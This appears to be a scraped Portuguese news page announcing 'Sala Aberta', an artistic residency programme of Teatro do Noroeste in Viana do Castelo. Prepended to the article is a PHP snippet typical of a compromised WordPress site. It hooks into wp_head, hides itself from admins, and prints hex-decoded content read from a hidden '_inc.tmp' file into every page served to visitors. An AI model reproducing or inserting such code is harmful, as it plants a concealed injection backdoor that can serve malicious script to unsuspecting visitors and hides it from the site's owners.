if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Viana com Sala Aberta - artesentreasletras.com.pt

Viana com Sala Aberta

Sala Aberta é o novo Programa de Residências Artísticas inaugurado esta semana pelo Teatro do Noroeste – Centro Dramático de Viana, no Teatro Municipal Sá de Miranda, em Viana do Castelo.
Em apoio às criadoras e criadores de arte do território vianense e alto-minhoto, o programa Sala Aberta proporciona espaço e tempo de residência a projetos artísticos de artes performativas, de forma regular, ao longo da temporada, segundo a Direção Geral das Artes.
Podem candidatar-se projetos de criação de obras de teatro, dança, música e cruzamentos disciplinares, a períodos de residência até 10 dias úteis, na Sala de Ensaios do Teatro Municipal Sá de Miranda.
Os projetos selecionados terão acesso aos períodos de residência aprovados, com acesso a sanitários, água, eletricidade, panejamento, linóleo, amplificação sonora e pré-instalação de equipamento de iluminação.
A iniciativa dinamizada pelo Projeto Comunidade do Teatro do Noroeste – Centro Dramático de Viana está inserida nas Comemorações do 30º Aniversário da companhia residente do Teatro Municipal Sá de Miranda.